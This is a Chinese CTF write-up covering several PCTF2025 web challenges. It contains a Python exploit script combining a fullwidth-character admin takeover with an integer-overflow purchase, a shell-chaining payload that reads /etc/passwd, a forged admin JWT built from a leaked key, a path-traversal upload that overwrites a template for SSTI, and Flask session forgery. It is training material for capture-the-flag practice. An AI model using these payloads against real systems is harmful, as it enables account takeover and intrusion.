PCTF2025(web后半部分)
神秘商店
打开题目只有一个登录框
登录admin
利用全角来注册登录
后端代码有转换,全角能够绕过后端对admin的检测,然后把全角admin识别成正常的admin,造成覆盖注册,修改admin密码
注册admin,其中n为全角
利用整数溢出4294967246到50,购买flag
可以直接脚本登录
import requests def exploit(): url = "http://challenge2.pctf.top:32735" session = requests.Session() print("[+] 注册管理员账户...") users = { "username": "admin", "password": "123456" } response = session.post(f"{url}/register", data=users) print(f"[+] 注册响应: {response.status_code}") print("[+] 登录...") users = { "username": "admin", "password": "123456" } response = session.post(f"{url}/login", data=users) print(f"[+] 登录响应: {response.status_code}") response = session.get(f"{url}/user") print(f"[+] 用户信息:{response.text}") print("[+] 触发rust整数溢出...") amount = {"amount": 4294967246} response = session.post(f"{url}/add_balance", data=amount) print(f"[+] 增加余额: {response.text}") print("[+] 购买Flag...") product = {"product_id": 4} response = session.post(f"{url}/buy_product", json=product) print(f"[+] 购买结果: {response.text}") if __name__ == '__main__': exploit() 
php特性
We_will_rockyou
下载源码,进行分析
''' Item: Safety Linux Server Panel Time: 2025-10-24 Author: 1ceLAND ''' from flask import Flask, redirect, url_for, render_template, request import jwt import uuid import os import subprocess from werkzeug.security import generate_password_hash, check_password_hash app = Flask(__name__) app.config['SECRET_KEY'] = str(uuid.uuid4()) # instead of sqlite accounts = {} def create_token(user_id, username): payload = { 'user_id': user_id, 'username': username } token = jwt.encode(payload, app.config['SECRET_KEY'], algorithm='HS256') if isinstance(token, bytes): token = token.decode('utf-8') return token def verify_token(token): try: payload = jwt.decode(token, app.config['SECRET_KEY'], algorithms=['HS256']) user_id = payload['user_id'] username = payload['username'] return user_id, username except: return None def login_required(f): from functools import wraps @wraps(f) def decorated(*args, **kwargs): token = request.cookies.get('token') if not token: return redirect(url_for('login')) res = verify_token(token) if not res: return redirect(url_for('login')) user_id, username = res return f(user_id, username, *args, **kwargs) return decorated def check_login(u, p): for user_id, info in accounts.items(): if info['username'] == u: return check_password_hash(info['password'], p), user_id return False, None @app.route('/') def index(): return redirect(url_for('login')) @app.route('/login', methods=['GET', 'POST']) def login(): error_msg = None if request.method == 'POST': username = request.form['username'] password = request.form['password'] ok, user_id = check_login(username, password) if ok: token = create_token(user_id, username) response = redirect(url_for('dashboard')) response.set_cookie('token', token, httponly=True) return response else: error_msg = "Username or Password incorrect!" return render_template('login.html', error_msg=error_msg) @app.route('/logout') def logout(): response = redirect(url_for('login')) response.delete_cookie('token') return response @app.route('/dashboard') @login_required def dashboard(user_id, username): return render_template('dashboard.html', user_id=user_id, username=username) import subprocess SAFE_COMMANDS = ['ls', 'pwd', 'whoami', 'dir', 'more'] @app.route('/dashboard/run', methods=['POST']) @login_required def run_command(user_id, username): user_id, username = verify_token(request.cookies.get('token')) cmd = request.form.get('command', '').strip() if not cmd or cmd.split()[0] not in SAFE_COMMANDS: return render_template('dashboard.html', user_id=user_id, username=username, error_msg="Error: Command not allowed or empty") try: result = subprocess.run(cmd, shell=True, capture_output=True, text=True, timeout=5) output = result.stdout + result.stderr return render_template('dashboard.html', user_id=user_id, username=username, output=output, command=cmd) except Exception as e: return render_template('dashboard.html', username=username, error_msg=f"Error: {str(e)}") if __name__ == '__main__': admin_id = 0 admin_username = 'admin123' admin_password = str(uuid.uuid4()) # password overlay for path in ['/password', './password.txt']: try: if os.path.exists(path) and os.path.isfile(path): with open(path, 'rb') as f: raw = f.read() if not raw: continue text = raw.decode('utf-8', errors='replace').strip() candidates = [line.strip() for line in text.splitlines() if line.strip()] if candidates: import secrets admin_password = secrets.choice(candidates) break except: pass print(f' * Admin password: {admin_password}') accounts[admin_id] = { 'username': admin_username, 'password': generate_password_hash(admin_password) } app.run(debug=False, host='0.0.0.0')基础配置与初始化
from flask import Flask, redirect, url_for, render_template, request import jwt import uuid import os import subprocess from werkzeug.security import generate_password_hash, check_password_hash app = Flask(__name__) # 每次重启服务器时,SECRET_KEY 都会随机生成,这意味着服务器重启后所有旧 Token 都会失效。 app.config['SECRET_KEY'] = str(uuid.uuid4()) # 内存数据库:用户信息存储在字典中,服务器重启则数据清空。 accounts = {}认证逻辑 (JWT)
这部分负责用户登录状态的维持。
def create_token(user_id, username): payload = { 'user_id': user_id, 'username': username } # 使用 HS256 算法加密生成 JWT token = jwt.encode(payload, app.config['SECRET_KEY'], algorithm='HS256') if isinstance(token, bytes): # 兼容旧版本 PyJWT token = token.decode('utf-8') return token def verify_token(token): try: # 解码并验证签名。由于使用了随机 UUID 作为 KEY,安全性在运行时还可以,但无法持久化。 payload = jwt.decode(token, app.config['SECRET_KEY'], algorithms=['HS256']) return payload['user_id'], payload['username'] except: return Nonedef login_required(f): from functools import wraps @wraps(f) def decorated(*args, **kwargs): token = request.cookies.get('token') if not token: return redirect(url_for('login')) res = verify_token(token) if not res: return redirect(url_for('login')) user_id, username = res # 将解析出的用户信息注入到被装饰的路由函数中 return f(user_id, username, *args, **kwargs) return decorated def check_login(u, p): # 遍历内存中的账户字典,比对哈希后的密码 for user_id, info in accounts.items(): if info['username'] == u: return check_password_hash(info['password'], p), user_id return False, None路由处理 (登录/登出)
@app.route('/login', methods=['GET', 'POST']) def login(): # ... 略 ... if ok: token = create_token(user_id, username) response = redirect(url_for('dashboard')) # 设置了 httponly=True,一定程度上防范了 XSS 攻击窃取 Cookie response.set_cookie('token', token, httponly=True) return response # ... 略 ...命令执行逻辑
SAFE_COMMANDS = ['ls', 'pwd', 'whoami', 'dir', 'more'] @app.route('/dashboard/run', methods=['POST']) @login_required def run_command(user_id, username): cmd = request.form.get('command', '').strip() # 检查机制:只判断命令行的第一个单词是否在白名单内 if not cmd or cmd.split()[0] not in SAFE_COMMANDS: return ... # 报错 try: # 风险点:shell=True。虽然开头是 ls,但可以利用 shell 拼接符。 # 例如输入: "ls ; cat /etc/passwd" # 这里的白名单检查只看到了 "ls",符合要求,但 shell 会执行后面的 cat 命令。 result = subprocess.run(cmd, shell=True, capture_output=True, text=True, timeout=5) output = result.stdout + result.stderr # ... 返回结果 ...启动逻辑与管理员密码初始化
if __name__ == '__main__': admin_id = 0 admin_username = 'admin123' # 默认随机生成一个 UUID 密码 admin_password = str(uuid.uuid4()) # 密码覆盖机制:尝试从系统文件读取密码 for path in ['/password', './password.txt']: try: if os.path.exists(path) and os.path.isfile(path): with open(path, 'rb') as f: raw = f.read() # ... 解码并从文件行中随机选一个作为 admin 密码 ... # 这意味着如果能控制这两个文件之一,就能预设管理员密码。 break except: pass # 启动时会在控制台打印管理员密码(用于初次运行查看) print(f' * Admin password: {admin_password}') accounts[admin_id] = { 'username': admin_username, 'password': generate_password_hash(admin_password) } app.run(debug=False, host='0.0.0.0')admin用户名不变一直为admin123
jwt密钥是随机生成的,可是这里审计发现admin密码虽然一开始是随机生成的,但是后面从一 个txt文本中随机抽取并覆盖了admin密码,这里考察点应该是用字典中的密码爆破
题目描述提示Try rockyou.txt!,则使用rockyou字典爆破密码,用户名是admin123
barbie
ls /
查看的方法有很多,过滤的waf也不行
信息收集,密码爆破,命令执行
Jwt_password_manager
from flask import Flask, request, redirect, url_for, render_template import jwt import uuid import os from werkzeug.security import generate_password_hash, check_password_hash app = Flask(__name__) # 关键安全点:JWT 签名使用的密钥。如果泄露,任何人都可以伪造 token app.config['SECRET_KEY'] = '0f3cbb44-f199-4d34-ade9-1545c0972648' accounts_usernames = [] # 存储所有注册的用户名 accounts = {} # 存储用户名及其对应的密码哈希值 {username: hash} user_passwords = {} # 存储每个用户的密码项 {username: [item1, item2, ...]} def check_username(new_username): if new_username in accounts_usernames: return True return False def check_login(username, password): if username not in accounts: return False return check_password_hash(accounts[username], password) def insert_account(new_username, new_password_hash): try: accounts_usernames.append(new_username) accounts[new_username] = new_password_hash user_passwords[new_username] = [] return True except: return False check_username(new_username): 检查用户名是否已被占用。 check_login(username, password): 使用 check_password_hash 验证用户输入的明文密码与存储的哈希值是否匹配。 insert_account(new_username, new_password_hash): 初始化新用户,在内存中为其开辟空间。 def create_token(username): # create jwt payload = { 'username': username, } token = jwt.encode(payload, app.config['SECRET_KEY'], algorithm='HS256') if isinstance(token, bytes): token = token.decode('utf-8') return token def verify_token(token): try: payload = jwt.decode(token, app.config['SECRET_KEY'], algorithms=['HS256']) return payload['username'] except: return None def login_required(f): def decorated(*args, **kwargs): token = request.cookies.get('token') if not token or not verify_token(token): return redirect(url_for('login')) return f(*args, **kwargs) decorated.__name__ = f.__name__ return decorated def add_password_item(username, website, site_username, password,): try: password_item = { 'id': str(uuid.uuid4()), 'website': website, 'username': site_username, 'password': password, 'notes': notes, } user_passwords[username].append(password_item) return True except: return False def delete_password_item(username, item_id): # delete ... try: user_passwords[username] = [item for item in user_passwords[username] if item['id'] != item_id] return True except: return False def get_user_passwords(username): # get all password_item of someone ... return user_passwords.get(username, []) @app.route('/') def index(): return redirect(url_for('login')) @app.route('/register', methods=['GET', 'POST']) def register(): if request.method == 'POST': username = request.form['username'] password = request.form['password'] user_exists = check_username(username) if user_exists: return render_template('register.html', error_msg="User Already Existed!") password_hash = generate_password_hash(password) insert_account(username, password_hash) return redirect(url_for('login')) return render_template('register.html') @app.route('/login', methods=['GET', 'POST']) def login(): if request.method == 'POST': username = request.form['username'] password = request.form['password'] user_exists = check_username(username) if user_exists == False: return render_template('login.html', error_msg='Username or Password Wrong!') if check_login(username, password): token = create_token(username) response = redirect(url_for('dashboard')) response.set_cookie('token', token, httponly=True) return response else: return render_template('login.html', error_msg='Username or Password Wrong!') return render_template('login.html') @app.route('/logout') def logout(): response = redirect(url_for('login')) response.delete_cookie('token') return response @app.route('/dashboard') @login_required def dashboard(): username = verify_token(request.cookies.get('token')) passwords = get_user_passwords(username) return render_template('dashboard.html', username=username, passwords=passwords) @app.route('/add_password', methods=['POST']) @login_required def add_password(): username = verify_token(request.cookies.get('token')) website = request.form['website'] site_username = request.form['site_username'] password = request.form['password'] notes = request.form.get('notes', '') if add_password_item(username, website, site_username, password, notes): return redirect(url_for('dashboard')) else: return render_template('dashboard.html', username=username, passwords=get_user_passwords(username), error_msg="Add password error") @app.route('/delete_password/<item_id>') @login_required def delete_password(item_id): username = verify_token(request.cookies.get('token')) if delete_password_item(username, item_id): return redirect(url_for('dashboard')) else: return render_template('dashboard.html', username=username, passwords=get_user_passwords(username), error_msg="Delete password error") if __name__ == '__main__': # 1. 自动创建一个 admin 账号,密码是随机生成的 UUID admin_password = str(uuid.uuid4()) insert_account('admin', generate_password_hash(admin_password)) # 2. 模拟 CTF 环境:读取服务器本地的 flag.txt 文件 for path in ['/flag', './flag.txt']: try: if os.path.exists(path) and os.path.isfile(path): with open(path, 'rb') as f: raw = f.read() if raw: content = raw.decode('utf-8', errors='replace').strip() # 3. 将读取到的 flag 作为一条密码存入 admin 账号中 add_password_item('admin', website='seeded-flag', ..., password=content) break except: pass app.run(debug=False, host='0.0.0.0')下载附件审计代码,发现泄露的jwt密钥,查看逻辑发现,他读取了flag,flag是admin的password
app.config['SECRET_KEY'] = '0f3cbb44-f199-4d34-ade9-1545c0972648'
admin_password = str(uuid.uuid4()) insert_account('admin', generate_password_hash(admin_password)) # flag in admin account ! ^-^ for path in ['/flag', './flag.txt']: try: if os.path.exists(path) and os.path.isfile(path): with open(path, 'rb') as f: raw = f.read() if raw: content = raw.decode('utf-8', errors='replace').strip() add_password_item('admin', website='seeded-flag', site_username='flag-file', password=content, notes=f'seeded from {path}') break except: pass那么我们就开始,先注册一个账号拿到普通的token,然后去jwt.io解密jwt然后修改成admin然后伪造后得到flag
伪造后admin的token为
然后修改为admin的token
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6ImIzMGEwYzNhLTI5Y2YtNGQ0ZS04ZDJiLTcxZGIxOWJlYjc2MiIsInVzZXJuYW1lIjoiYWRtaW4ifQ.PMpPt65DM7rU-z3gljV1f8z5h_DIXSmoDQnMu2vKgQo
保存密码获取flag
JWT伪造
ez_upload
这里打开文件,上传任何文件都查看不了,尝试直接读取/etc/passwd但是被过滤了,查看源码
import os import uuid from flask import Flask, request, render_template_string, redirect, url_for, send_from_directory, flash, jsonify from werkzeug.exceptions import RequestEntityTooLarge app = Flask(__name__) app.secret_key = 'your_secret_key_here' UPLOAD_FOLDER = 'uploads' MAX_FILE_SIZE = 16 * 1024 * 1024 ALLOWED_EXTENSIONS = {'txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif', 'doc', 'docx', 'zip', 'html'} BLACKLIST_KEYWORDS = [ 'env', '.env', 'environment', 'profile', 'bashrc', 'proc', 'sys', 'etc', 'passwd', 'shadow', 'flag' ] app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER app.config['MAX_CONTENT_LENGTH'] = MAX_FILE_SIZE if not os.path.exists(UPLOAD_FOLDER): os.makedirs(UPLOAD_FOLDER) def allowed_file(filename): return '.' in filename and filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS @app.route('/') def index(): try: with open('templates/index.html', 'r', encoding='utf-8') as f: template_content = f.read() return render_template_string(template_content) except FileNotFoundError: try: with open('templates/error_template_not_found.html', 'r', encoding='utf-8') as f: return f.read() except: return '<h1>错误</h1><p>模板文件未找到</p><a href="/upload">上传文件</a>' except Exception as e: try: with open('templates/error_render.html', 'r', encoding='utf-8') as f: template = f.read() return render_template_string(template, error_message=str(e)) except: return '<h1>渲染错误</h1><p>' + str(e) + '</p><a href="/upload">上传文件</a>' @app.route('/upload', methods=['GET', 'POST']) def upload_file(): if request.method == 'POST': if 'file' not in request.files: flash('没有选择文件') return redirect(request.url) file = request.files['file'] if file.filename == '': flash('没有选择文件') return redirect(request.url) if file and allowed_file(file.filename): filename = file.filename filename = filename.replace('../', '') file_path = os.path.join(UPLOAD_FOLDER, filename) try: file.save(file_path) flash('文件 {} 上传成功!'.format(filename)) return redirect('/upload') except Exception as e: flash('文件上传失败: {}'.format(str(e))) return redirect(request.url) else: flash('不允许的文件类型') return redirect(request.url) try: with open('templates/upload.html', 'r', encoding='utf-8') as f: template_content = f.read() return render_template_string(template_content) except FileNotFoundError: try: with open('templates/error_upload_not_found.html', 'r', encoding='utf-8') as f: return f.read() except: return '<h1>错误</h1><p>上传页面模板未找到</p><a href="/">返回主页</a>' @app.route('/file') def view_file(): file_path = request.args.get('file', '') if not file_path: try: with open('templates/file_no_param.html', 'r', encoding='utf-8') as f: return f.read() except: return '<h1>文件查看</h1><p>请使用 ?file= 参数指定要查看的文件</p><a href="/">返回主页</a>' file_path_lower = file_path.lower() for keyword in BLACKLIST_KEYWORDS: if keyword in file_path_lower: try: with open('templates/file_error.html', 'r', encoding='utf-8') as f: template = f.read() return render_template_string(template, file_path=file_path, error_message='访问被拒绝:文件路径包含敏感关键词 [{}]'.format(keyword)) except: return '<h1>访问被拒绝</h1><p>文件路径包含敏感关键词</p><a href="/">返回主页</a>' try: with open(file_path, 'r', encoding='utf-8') as f: file_content = f.read() try: with open('templates/file_view.html', 'r', encoding='utf-8') as f: template = f.read() return render_template_string(template, file_path=file_path, file_content=file_content) except: return '<h1>文件内容</h1><pre>{}</pre><a href="/">返回主页</a>'.format(file_content) except Exception as e: try: with open('templates/file_error.html', 'r', encoding='utf-8') as f: template = f.read() return render_template_string(template, file_path=file_path, error_message=str(e)) except: return '<h1>文件读取失败</h1><p>错误: {}</p><a href="/">返回主页</a>'.format(str(e)) @app.errorhandler(RequestEntityTooLarge) def too_large(e): try: with open('templates/error_too_large.html', 'r', encoding='utf-8') as f: template = f.read() return render_template_string(template, max_size=MAX_FILE_SIZE // (1024*1024)), 413 except: return '<h1>文件过大</h1><p>文件大小不能超过 {} MB</p>'.format(MAX_FILE_SIZE // (1024*1024)), 413 @app.errorhandler(404) def not_found(e): try: with open('templates/error_404.html', 'r', encoding='utf-8') as f: return f.read(), 404 except: return '<h1>404</h1><p>页面不存在</p>', 404 @app.errorhandler(500) def server_error(e): try: with open('templates/error_500.html', 'r', encoding='utf-8') as f: template = f.read() return render_template_string(template, error_message=str(e)), 500 except: return '<h1>500</h1><p>服务器内部错误: {}</p>'.format(str(e)), 500 if __name__ == '__main__': print("启动Flask文件上传应用...") print("上传目录: {}".format(UPLOAD_FOLDER)) print("最大文件大小: {} MB".format(MAX_FILE_SIZE // (1024*1024))) print("允许的文件类型: {}".format(ALLOWED_EXTENSIONS)) app.run(debug=False, host='0.0.0.0', port=5000)@app.route('/file') def view_file(): file_path = request.args.get('file', '') # 从 URL 参数 ?file= 获取路径 if not file_path: # ... (逻辑省略) # [黑名单防御] file_path_lower = file_path.lower() for keyword in BLACKLIST_KEYWORDS: if keyword in file_path_lower: # 如果命中黑名单,渲染错误信息 return render_template_string(template, error_message='...{}'.format(keyword)) try: with open(file_path, 'r', encoding='utf-8') as f: # [高危] 直接打开用户指定的路径 file_content = f.read() # [SSTI 漏洞] # file_content 是用户上传的文件内容 # 如果用户上传一个包含 {{ 7*7 }} 的文件并在此查看,Flask 会执行其中的模板代码 return render_template_string(template, file_path=file_path, file_content=file_content) except Exception as e: # ... (错误处理)render_template_string渲染了html页面内容,则可以实现覆盖index.html在里面实现ssti绕过上传限制....//templates/index.html
成功读取
SSTI,信息收集
Do_you_know_session?
看到题目到处试了试ssti,发现在搜索框中可以进行ssti
/search?context=
但是有waf,只能看到config,刚好secretkey就存在这里,我们直接就可以获取到
1919810#mistyovo@foxdog@lzz0403#114514
然后我们看到我们有session,用flask-session-cookie-manager
读取environ得到flag
session伪造